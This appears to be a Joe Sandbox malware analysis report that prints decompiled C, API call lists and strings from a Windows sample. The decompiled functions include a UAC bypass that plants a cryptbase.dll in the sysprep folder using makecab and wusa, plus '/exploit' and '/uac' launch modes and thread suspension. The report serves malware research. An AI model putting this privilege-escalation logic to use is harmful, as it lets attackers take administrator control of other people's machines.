Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C

Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
Part of subcall function 00D32F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
Part of subcall function 00D32F02: GetLastError.KERNEL32 ref: 00D33055

GetTempPathA.KERNEL32(00000104,?), ref: 00D3330F
GetTickCount.KERNEL32 ref: 00D33311
_strlen.LIBCMT ref: 00D33324
wsprintfA.USER32 ref: 00D33332
MoveFileA.KERNEL32(?,?), ref: 00D33349

Part of subcall function 00D324AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
Part of subcall function 00D324AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
Part of subcall function 00D324AA: FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
Part of subcall function 00D324AA: CloseHandle.KERNEL32(00000000), ref: 00D324F6
Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE

LocalFree.KERNEL32(?,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D33384
CopyFileA.KERNEL32(?,?,00000000), ref: 00D334DF

Part of subcall function 00D33065: RegisterClassExA.USER32(?), ref: 00D330A4
Part of subcall function 00D33065: UnregisterClassA.USER32(?,?), ref: 00D330B4

GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D333D2
RegisterWindowMessageA.USER32(?,?), ref: 00D3341D

Part of subcall function 00D327DD: GetVersionExA.KERNEL32(?), ref: 00D327F7
Part of subcall function 00D327DD: GetLastError.KERNEL32 ref: 00D32818

LockWorkStation.USER32 ref: 00D3343D

Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D330FF
Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D33114
Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D33127
Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D3313A

CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00D33456
GetLastError.KERNEL32 ref: 00D33463
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00D33471
CloseHandle.KERNEL32(00000000), ref: 00D33485
GetTempPathA.KERNEL32(00000104,?), ref: 00D33493
GetTickCount.KERNEL32 ref: 00D33495
_strlen.LIBCMT ref: 00D334A8
wsprintfA.USER32 ref: 00D334B6
MoveFileA.KERNEL32(?,?), ref: 00D334CD

Strings

kernel32.dll, xrefs: 00D33202
\%.8x.tmp, xrefs: 00D331DC, 00D3331E, 00D334A2
IsWow64Process, xrefs: 00D331FD
Global\AtomFun, xrefs: 00D3344C
\uxtheme.dll, xrefs: 00D33179, 00D331A7, 00D33291, 00D333EE

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: File$ErrorLast$Handle$InputModulePathSendTemp$AddressCloseCountCreateProcTick_strlenwsprintf$ClassClipboardFormatLocalMoveNameRegister$AllocBuffersCheckCopyCurrentDirectoryEventFlushFreeLockMappedMessageObjectProcessReadSingleSizeStationSystemUnregisterVersionWaitWindowWorkWrite_memset
String ID: Global\AtomFun$IsWow64Process$\%.8x.tmp$\uxtheme.dll$kernel32.dll
API String ID: 1235156964-746268175
Opcode ID: 193cebc3165e6567cfa4dd3df8f7029aff6ea665a5c294871f733cfca0c999f7
Instruction ID: 4f1f9e1947840b6508a802ae8e85d0289fc75af6d4dd923670b529d3b361552f
Opcode Fuzzy Hash: 193cebc3165e6567cfa4dd3df8f7029aff6ea665a5c294871f733cfca0c999f7
Instruction Fuzzy Hash: B7A1F97680025AABDF11AFA0DD49AEE77BCEF08351F0445A6F505E2150EB74DB94CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D32BDC, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 209
filelibraryloaderCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00D32BDC(void* __ebx) {
				intOrPtr _t71;
				long _t74;
				void* _t135;
				void* _t143;
				int _t152;
				intOrPtr* _t154;
				signed int _t155;
				void* _t159;
				void* _t161;

				_t135 = __ebx;
				_t159 = _t161 - 0x6c;
				 *((intOrPtr*)(_t159 + 0x5c)) = 0;
				 *((intOrPtr*)(_t159 + 0x60)) = 0;
				_t154 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_t154 != 0) {
					 *_t154(GetCurrentProcess(), _t159 + 0x60);
				}
				 *(_t159 - 0x38) = 0x94;
				_t155 = 0 |  *((intOrPtr*)(_t159 + 0x60)) == 0x00000000;
				if(GetVersionExA(_t159 - 0x38) == 0) {
					GetLastError();
					goto L23;
				} else {
					if( *((intOrPtr*)(_t159 - 0x28)) != 2 ||  *((intOrPtr*)(_t159 - 0x34)) != 6 ||  *((intOrPtr*)(_t159 - 0x30)) != 1 &&  *((intOrPtr*)(_t159 - 0x30)) != 2) {
						_t155 = 0;
					}
					if(_t155 == 0) {
						L23:
						_t71 = 0;
						goto L24;
					} else {
						GetTempPathA(0x104, _t159 - 0x240);
						_t74 = GetTickCount();
						wsprintfA(_t159 + E00D33620(_t159 - 0x240) - 0x240, "\\%.8x.tmp", _t74);
						if(E00D324AA(_t159 - 0x240,  *((intOrPtr*)(_t159 + 0x74)),  *(_t159 + 0x78)) == 0) {
							goto L23;
						}
						GetSystemDirectoryA(_t159 - 0x54c, 0x104);
						E00D33A60(_t159 - 0x54c, "\\cryptbase.dll");
						GetTempPathA(0x104, _t159 - 0x344);
						E00D33A60(_t159 - 0x344, "\\cryptbase.dll");
						 *(_t159 + 0x68) =  *(_t159 + 0x68) & 0x00000000;
						 *(_t159 + 0x64) =  *(_t159 + 0x64) & 0x00000000;
						_t143 = _t135;
						if(E00D3250C(_t143, _t159 - 0x54c, _t159 + 0x68, _t159 + 0x64) != 0) {
							if(E00D32F02( *(_t159 + 0x68),  *(_t159 + 0x64), _t159 - 0x240,  *((intOrPtr*)(_t159 + 0x7c))) != 0 && E00D324AA(_t159 - 0x344,  *(_t159 + 0x68),  *(_t159 + 0x64)) != 0) {
								GetTempPathA(0x104, _t159 - 0x13c);
								E00D33A60(_t159 - 0x13c, "\\cryptbase.msu");
								DeleteFileA(_t159 - 0x13c);
								_push(_t159 - 0x13c);
								E00D32AF9(0, "makecab.exe /V1 %s %s", _t159 - 0x344);
								if(E00D3259B(_t159 - 0x13c) != 0) {
									_t152 = 0x103;
									GetWindowsDirectoryA(_t159 - 0x650, _t152);
									E00D33A60(_t159 - 0x650, "\\system32\\sysprep\\sysprep.exe");
									GetWindowsDirectoryA(_t159 - 0x448, _t152);
									E00D33A60(_t159 - 0x448, "\\system32\\sysprep\\cryptbase.dll");
									E00D32AF9(0, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\system32\\sysprep", _t159 - 0x13c);
									if(E00D3259B(_t159 - 0x448) != 0) {
										 *(_t159 + 0x78) =  *(_t159 + 0x78) & 0x00000000;
										if(E00D32AF9(_t159 + 0x78, "cmd.exe /C %s", _t159 - 0x650) != 0 &&  *(_t159 + 0x78) == 0x50574e44) {
											 *((intOrPtr*)(_t159 + 0x5c)) = 1;
										}
										DeleteFileA(_t159 - 0x448);
									}
									DeleteFileA(_t159 - 0x13c);
								}
							}
							LocalFree( *(_t159 + 0x68));
						}
						DeleteFileA(_t159 - 0x344);
						DeleteFileA(_t159 - 0x240);
						_t71 =  *((intOrPtr*)(_t159 + 0x5c));
						L24:
						return _t71;
					}
				}
			}

0x00d32bdc
0x00d32bdd
0x00d32bf5
0x00d32bf8
0x00d32c08
0x00d32c0c
0x00d32c19
0x00d32c19
0x00d32c20
0x00d32c2a
0x00d32c38
0x00d32e77
0x00000000
0x00d32c3e
0x00d32c42
0x00d32c56
0x00d32c56
0x00d32c5a
0x00d32e7d
0x00d32e7d
0x00000000
0x00d32c60
0x00d32c73
0x00d32c75
0x00d32c96
0x00d32cb3
0x00000000
0x00000000
0x00d32cc2
0x00d32cd5
0x00d32ce4
0x00d32cee
0x00d32cf3
0x00d32cf7
0x00d32cfc
0x00d32d19
0x00d32d36
0x00d32d5e
0x00d32d6c
0x00d32d7a
0x00d32d82
0x00d32d91
0x00d32da7
0x00d32dad
0x00d32dbe
0x00d32dcc
0x00d32ddb
0x00d32de9
0x00d32dfc
0x00d32e12
0x00d32e14
0x00d32e32
0x00d32e3d
0x00d32e3d
0x00d32e4b
0x00d32e4b
0x00d32e54
0x00d32e54
0x00d32da7
0x00d32e59
0x00d32e59
0x00d32e66
0x00d32e6f
0x00d32e71
0x00d32e7f
0x00d32e85
0x00d32e85
0x00d32c5a

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00D32BFB
GetProcAddress.KERNEL32(00000000), ref: 00D32C02
GetCurrentProcess.KERNEL32(?), ref: 00D32C12
GetVersionExA.KERNEL32(?), ref: 00D32C30
GetTempPathA.KERNEL32(00000104,?), ref: 00D32C73
GetTickCount.KERNEL32 ref: 00D32C75
_strlen.LIBCMT ref: 00D32C88
wsprintfA.USER32 ref: 00D32C96

Part of subcall function 00D324AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
Part of subcall function 00D324AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
Part of subcall function 00D324AA: FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
Part of subcall function 00D324AA: CloseHandle.KERNEL32(00000000), ref: 00D324F6
Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D32CC2
GetTempPathA.KERNEL32(00000104,?), ref: 00D32CE4

Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C

DeleteFileA.KERNEL32(?), ref: 00D32E6F

Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
Part of subcall function 00D32F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
Part of subcall function 00D32F02: GetLastError.KERNEL32 ref: 00D33055

GetTempPathA.KERNEL32(00000104,?), ref: 00D32D5E
DeleteFileA.KERNEL32(?), ref: 00D32D7A

Part of subcall function 00D32AF9: LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00D32B25
Part of subcall function 00D32AF9: _memset.LIBCMT ref: 00D32B4D
Part of subcall function 00D32AF9: _memset.LIBCMT ref: 00D32B5B
Part of subcall function 00D32AF9: GetStartupInfoA.KERNEL32(?), ref: 00D32B6A
Part of subcall function 00D32AF9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D32D96), ref: 00D32B8C
Part of subcall function 00D32AF9: WaitForSingleObject.KERNEL32(00D32D96,000000FF), ref: 00D32B9B
Part of subcall function 00D32AF9: GetExitCodeProcess.KERNEL32(00D32D96,?), ref: 00D32BAC
Part of subcall function 00D32AF9: CloseHandle.KERNEL32(00000000), ref: 00D32BBB
Part of subcall function 00D32AF9: CloseHandle.KERNEL32(00D32D96), ref: 00D32BC0
Part of subcall function 00D32AF9: GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00D32BC7
Part of subcall function 00D32AF9: LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00D32BCE

Part of subcall function 00D3259B: FindFirstFileA.KERNEL32(00D32DA5,?,00000104), ref: 00D325B1
Part of subcall function 00D3259B: FindClose.KERNEL32(00000000), ref: 00D325BE

GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00D32DBE
GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00D32DDB
DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E4B
DeleteFileA.KERNEL32(?,?), ref: 00D32E54
LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D32E59
DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E66
GetLastError.KERNEL32 ref: 00D32E77

Strings

cmd.exe /C %s, xrefs: 00D32E22
kernel32.dll, xrefs: 00D32BF0
\cryptbase.msu, xrefs: 00D32D66
makecab.exe /V1 %s %s, xrefs: 00D32D8A
\%.8x.tmp, xrefs: 00D32C82
\system32\sysprep\cryptbase.dll, xrefs: 00D32DE3
\system32\sysprep\sysprep.exe, xrefs: 00D32DC6
IsWow64Process, xrefs: 00D32BE9
cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep, xrefs: 00D32DF5
\cryptbase.dll, xrefs: 00D32CC8, 00D32CD3, 00D32CEC
DNWP, xrefs: 00D32E34

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: File$ErrorLast$Handle$CloseDelete$Local$AddressCreateDirectoryModulePathProcProcessTemp$AllocFindFreeWindows_memset$BuffersCheckCodeCountCurrentExitFirstFlushInfoMappedObjectReadSingleSizeStartupSystemTickVersionWaitWrite_strlenwsprintf
String ID: DNWP$IsWow64Process$\%.8x.tmp$\cryptbase.dll$\cryptbase.msu$\system32\sysprep\cryptbase.dll$\system32\sysprep\sysprep.exe$cmd.exe /C %s$cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep$kernel32.dll$makecab.exe /V1 %s %s
API String ID: 1577429191-2259624556
Opcode ID: cc3325bdc3052dd07d7dc03fd768ca8466bb6bf2c8beda8b073aff80fe4660e0
Instruction ID: 1bbac14094e4af6f8260a20552a817b929a2a422514c7d87968a4f1ca02a522a
Opcode Fuzzy Hash: cc3325bdc3052dd07d7dc03fd768ca8466bb6bf2c8beda8b073aff80fe4660e0
Instruction Fuzzy Hash: 73711DB6D0021DAADF20EBA4DC89AEE77ACEB04340F140466F909E2150E734DA88CF74

Uniqueness

Uniqueness Score: -1.00%

Function 00D31E99, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 95
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00D31E99(void* _a8) {
				char _v264;
				void* _t22;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t40;

				_t55 = _a8 != 1;
				if(_a8 != 1) {
					L9:
					return 1;
				}
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				GetCurrentProcessId();
				E00D321BB( &_v264);
				_t22 = E00D33590(E00D325CB(_t55,  &_v264), "utilman.exe");
				_t56 = _t22;
				if(_t22 == 0) {
					L10:
					_t40 = OpenEventA(2, 0, "Global\\AtomFun");
					__eflags = _t40;
					if(_t40 == 0) {
						GetLastError();
					} else {
						SetEvent(_t40);
						CloseHandle(_t40);
					}
					_t25 = E00D327DD();
					__eflags = _t25;
					if(_t25 != 0) {
						_t27 = E00D32822(GetCurrentProcessId());
						__eflags = _t27;
						if(_t27 > 0) {
							E00D31C33(_t27, 0);
						}
					}
					L16:
					_push(0);
					L7:
					ExitProcess();
				}
				_t33 = E00D33590(E00D325CB(_t56,  &_v264), "logonui.exe");
				_t57 = _t33;
				if(_t33 == 0) {
					goto L10;
				}
				if(E00D33590(E00D325CB(_t57,  &_v264), "sysprep.exe") != 0) {
					goto L9;
				}
				_push( &_a8);
				_a8 = 0;
				_push(GetCurrentProcess());
				if(E00D3289C() == 0 || _a8 < 0x3000) {
					goto L16;
				} else {
					_push(0x50574e44);
					goto L7;
				}
			}

0x00d31ea5
0x00d31ea6
0x00d31f62
0x00d31f66
0x00d31f66
0x00d31ec4
0x00d31ed0
0x00d31ed9
0x00d31ef0
0x00d31ef7
0x00d31ef9
0x00d31f69
0x00d31f77
0x00d31f79
0x00d31f7b
0x00d31f8d
0x00d31f7d
0x00d31f7e
0x00d31f85
0x00d31f85
0x00d31f93
0x00d31f98
0x00d31f9a
0x00d31f9f
0x00d31fa4
0x00d31fa6
0x00d31faa
0x00d31faa
0x00d31fa6
0x00d31faf
0x00d31faf
0x00d31f5a
0x00d31f5a
0x00d31f5a
0x00d31f0d
0x00d31f14
0x00d31f16
0x00000000
0x00000000
0x00d31f33
0x00000000
0x00d31f61
0x00d31f38
0x00d31f39
0x00d31f42
0x00d31f4a
0x00000000
0x00d31f55
0x00d31f55
0x00000000
0x00d31f55

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?), ref: 00D31EBD
GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00D31EC4
GetCurrentProcessId.KERNEL32(?,?), ref: 00D31ED0

Part of subcall function 00D325CB: _strlen.LIBCMT ref: 00D325D7
Part of subcall function 00D325CB: _strlen.LIBCMT ref: 00D325F2

GetCurrentProcess.KERNEL32(?,sysprep.exe,logonui.exe,utilman.exe,?,?,?), ref: 00D31F3C

Part of subcall function 00D3289C: _memset.LIBCMT ref: 00D328CA
Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?), ref: 00D328F0
Part of subcall function 00D3289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3293B
Part of subcall function 00D3289C: LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
Part of subcall function 00D3289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
Part of subcall function 00D3289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3298B
Part of subcall function 00D3289C: LocalFree.KERNEL32(00000000), ref: 00D32992
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299A
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299E
Part of subcall function 00D3289C: CloseHandle.KERNEL32(?), ref: 00D329A7
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D329AF

ExitProcess.KERNEL32 ref: 00D31F5A
OpenEventA.KERNEL32(00000002,00000000,Global\AtomFun,utilman.exe,?,?,?), ref: 00D31F71
SetEvent.KERNEL32(00000000,?,?), ref: 00D31F7E
CloseHandle.KERNEL32(00000000), ref: 00D31F85
GetLastError.KERNEL32(?,?), ref: 00D31F8D

Part of subcall function 00D327DD: GetVersionExA.KERNEL32(?), ref: 00D327F7
Part of subcall function 00D327DD: GetLastError.KERNEL32 ref: 00D32818

GetCurrentProcessId.KERNEL32(?,?), ref: 00D31F9C

Part of subcall function 00D32822: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D32832
Part of subcall function 00D32822: Process32First.KERNEL32(00000000,?), ref: 00D32850
Part of subcall function 00D32822: Process32Next.KERNEL32(00000000,00000128), ref: 00D3286C
Part of subcall function 00D32822: GetLastError.KERNEL32(00000000,7622D965), ref: 00D3287F
Part of subcall function 00D32822: CloseHandle.KERNEL32(00000000), ref: 00D32886
Part of subcall function 00D32822: GetLastError.KERNEL32(00000000,7622D965), ref: 00D3288E

Part of subcall function 00D31C33: CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00D31C43
Part of subcall function 00D31C33: Thread32First.KERNEL32(00000000,?), ref: 00D31C66
Part of subcall function 00D31C33: OpenThread.KERNEL32(00000002,00000000,00D31FAF,7622D965,00000000,00000004,?,00000000), ref: 00D31C91
Part of subcall function 00D31C33: SuspendThread.KERNEL32(00000000), ref: 00D31C9E
Part of subcall function 00D31C33: CloseHandle.KERNEL32(00000000), ref: 00D31CAD
Part of subcall function 00D31C33: Thread32Next.KERNEL32(00000000,0000001C), ref: 00D31CB4
Part of subcall function 00D31C33: GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00D31CC0
Part of subcall function 00D31C33: CloseHandle.KERNEL32(00000000), ref: 00D31CC7
Part of subcall function 00D31C33: GetLastError.KERNEL32(00000004,?,00000000,?,?,00D31FAF,00000000,00000000,00000000), ref: 00D31CCC

Strings

logonui.exe, xrefs: 00D31EFB
Global\AtomFun, xrefs: 00D31F69
utilman.exe, xrefs: 00D31EDE
sysprep.exe, xrefs: 00D31F18

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$Handle$CloseProcess$CurrentOpenTokenVersion$AuthorityCreateEventFirstInformationLocalModuleNextProcess32SnapshotThreadThread32Toolhelp32_strlen$AllocCountExitFileFreeNameSuspend_memset
String ID: Global\AtomFun$logonui.exe$sysprep.exe$utilman.exe
API String ID: 1416955679-3994176926
Opcode ID: 553a0aa76fa38d5b5615204555bd2b8f69f3f00d950f9c1c30b4c97ff6bc81d2
Instruction ID: 29d9fb16c42810c320b75ef84f06ce2843e21e73036db6e8fd4f780be17dc697
Opcode Fuzzy Hash: 553a0aa76fa38d5b5615204555bd2b8f69f3f00d950f9c1c30b4c97ff6bc81d2
Instruction Fuzzy Hash: 6421607F904347ABCB14BBB19D4EEAE376CEF45350F044815B605D2141EB78D6848A70

Uniqueness

Uniqueness Score: -1.00%

Function 00D31CDA, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 140
sleepCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00D31CDA(void* __ecx) {
				void* __ebx;
				void* _t56;
				void* _t58;
				void* _t80;
				void* _t84;
				void* _t86;
				void* _t97;
				void* _t99;

				_t86 = __ecx;
				_t97 = _t99 - 0x78;
				_t84 = E00D329C6();
				E00D33510(_t97 - 0x40, 0, 0x9c);
				 *(_t97 - 0x40) = 0x9c;
				if(GetVersionExA(_t97 - 0x40) != 0) {
					L2:
					 *((intOrPtr*)(_t97 + 0x60)) = 0;
					if( *((intOrPtr*)(_t97 - 0x3c)) < 6) {
						L4:
						GetCommandLineA();
						_push(_t97 + 0x64);
						_push(_t97 + 0x68);
						_push(_t97 + 0x6c);
						_push(_t97 + 0x5c);
						 *((intOrPtr*)(_t97 + 0x5c)) = 0;
						 *((intOrPtr*)(_t97 + 0x6c)) = 0;
						 *((intOrPtr*)(_t97 + 0x68)) = 0;
						 *((intOrPtr*)(_t97 + 0x64)) = 0;
						_push(GetModuleHandleA(0));
						_t56 = E00D32308(_t108);
						if(_t56 == 0) {
							L19:
							E00D32481();
							L20:
							return 0;
						}
						if( *((intOrPtr*)(_t97 + 0x5c)) != 0 ||  *((intOrPtr*)(_t97 + 0x64)) != 0) {
							L17:
							_t58 = E00D322DC(_t118);
							_t119 = _t58;
							if(_t58 == 0) {
								E00D31434(_t119);
							}
							goto L19;
						} else {
							__imp__#680();
							if(_t56 != 0) {
								goto L17;
							}
							GetModuleFileNameA(GetModuleHandleA(0), _t97 - 0x144, 0x103);
							 *(_t97 + 0x74) = 0;
							 *((intOrPtr*)(_t97 + 0x70)) = 0;
							if(E00D3250C(_t86, _t97 - 0x144, _t97 + 0x74, _t97 + 0x70) != 0) {
								 *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) =  *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) | 0x00002000;
								if( *((intOrPtr*)(_t97 - 0x3c)) < 6 || _t84 == 0 &&  *((intOrPtr*)(_t97 + 0x6c)) == 0) {
									_push(_t97 - 0x144);
									_push("\"%s\" /exploit");
									_push(_t97 - 0x248);
									E00D33E87();
									E00D33143(__eflags,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
								} else {
									if( *((intOrPtr*)(_t97 + 0x60)) < 0x3000) {
										_t118 =  *((intOrPtr*)(_t97 + 0x68));
										if( *((intOrPtr*)(_t97 + 0x68)) == 0) {
											_push(_t97 - 0x144);
											_push("\"%s\" /uac");
											_push(_t97 - 0x248);
											E00D33E87();
											E00D32BDC(_t84,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
										}
									}
								}
								Sleep(0xbb8);
								LocalFree( *(_t97 + 0x74));
							}
							goto L17;
						}
					}
					_push(_t97 + 0x60);
					_push(GetCurrentProcess());
					_t80 = E00D3289C();
					_t108 = _t80;
					if(_t80 == 0) {
						goto L20;
					}
					goto L4;
				}
				 *(_t97 - 0x40) = 0x94;
				if(GetVersionExA(_t97 - 0x40) == 0) {
					goto L20;
				}
				goto L2;
			}

0x00d31cda
0x00d31cdb
0x00d31cf3
0x00d31cfc
0x00d31d07
0x00d31d15
0x00d31d2c
0x00d31d30
0x00d31d33
0x00d31d4d
0x00d31d4d
0x00d31d5c
0x00d31d60
0x00d31d64
0x00d31d68
0x00d31d6a
0x00d31d6d
0x00d31d70
0x00d31d73
0x00d31d78
0x00d31d79
0x00d31d80
0x00d31e8a
0x00d31e8a
0x00d31e8f
0x00d31e98
0x00d31e98
0x00d31d89
0x00d31e7c
0x00d31e7c
0x00d31e81
0x00d31e83
0x00d31e85
0x00d31e85
0x00000000
0x00d31d98
0x00d31d98
0x00d31da0
0x00000000
0x00000000
0x00d31db6
0x00d31dcb
0x00d31dce
0x00d31dd8
0x00d31deb
0x00d31df3
0x00d31e41
0x00d31e48
0x00d31e4d
0x00d31e4e
0x00d31e63
0x00d31dfe
0x00d31e05
0x00d31e07
0x00d31e0a
0x00d31e12
0x00d31e19
0x00d31e1e
0x00d31e1f
0x00d31e34
0x00d31e34
0x00d31e0a
0x00d31e05
0x00d31e6d
0x00d31e76
0x00d31e76
0x00000000
0x00d31dd8
0x00d31d89
0x00d31d38
0x00d31d3f
0x00d31d40
0x00d31d45
0x00d31d47
0x00000000
0x00000000
0x00000000
0x00d31d47
0x00d31d1b
0x00d31d26
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00D329C6: _memset.LIBCMT ref: 00D329E1
Part of subcall function 00D329C6: GetVersionExA.KERNEL32(?,?,?), ref: 00D329F0
